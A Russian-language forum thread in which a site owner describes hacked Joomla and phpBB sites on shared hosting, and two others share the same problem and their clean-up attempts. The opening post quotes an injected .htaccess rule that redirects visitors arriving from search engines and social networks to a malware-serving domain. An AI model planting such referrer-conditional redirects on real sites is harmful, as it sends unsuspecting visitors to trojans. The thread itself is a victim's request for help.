Привет знатокам Я в этом мало что понимаю, но кратко рассказываю суть: 1. Сайты открываются и работают, однако, если перейти к ним по ссылке с других сайтов, социалок или через поиск, то вылетает редирект и Eset Smart Security ловит троян. 2. Оказались все 20 сайтов на Joomla 1.5, 2.5 и форум PhpBB взломанными на моем хостинге Timeweb. 3. Обнаружены .htaccess с редиректами типа: ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|)\.(.*) RewriteRule ^(.*)$ http://tropas.ru/in.cgi?4 [R=301,L] 4. Удалил все эти файлы, восстановил их из бекапов. 5. Утром все повторилось, обнаружил поврежденный файл .htaccess в корне хостинга (не сайта, а хостинга), а к нему еще какой-то .authfile - удалил оба, сменил пароль админа хостинга, подменил поврежденные файлы .htaccess в папках сайтов. 6. Повторилось. Вопросы: 1. Что происходит? 2. Взломали мой аккаунт на хостинге, FTP или все это развивается на уровне сайтов? 3. Как может файл htaccess появляться в корне хостинга, т.е. выше public_html, выше корня сайта, там, где я вижу все папки с сайтами? 4. Что делать?
Аналогичная проблема, этот файл был изменен сегодня ночью. Смена паролей фтп может полностью избавиться от этой проблемы?
я проверил проверь комп свежим антивирем, посмотрел фтп логи, удалил всех фтп пользователей, зачистил лишнее из htaccess, удалил все из папок tmp и cache. Пока все норм. Думаю троян сидит глубоко в системе, думаю переустановиться полностью систему.
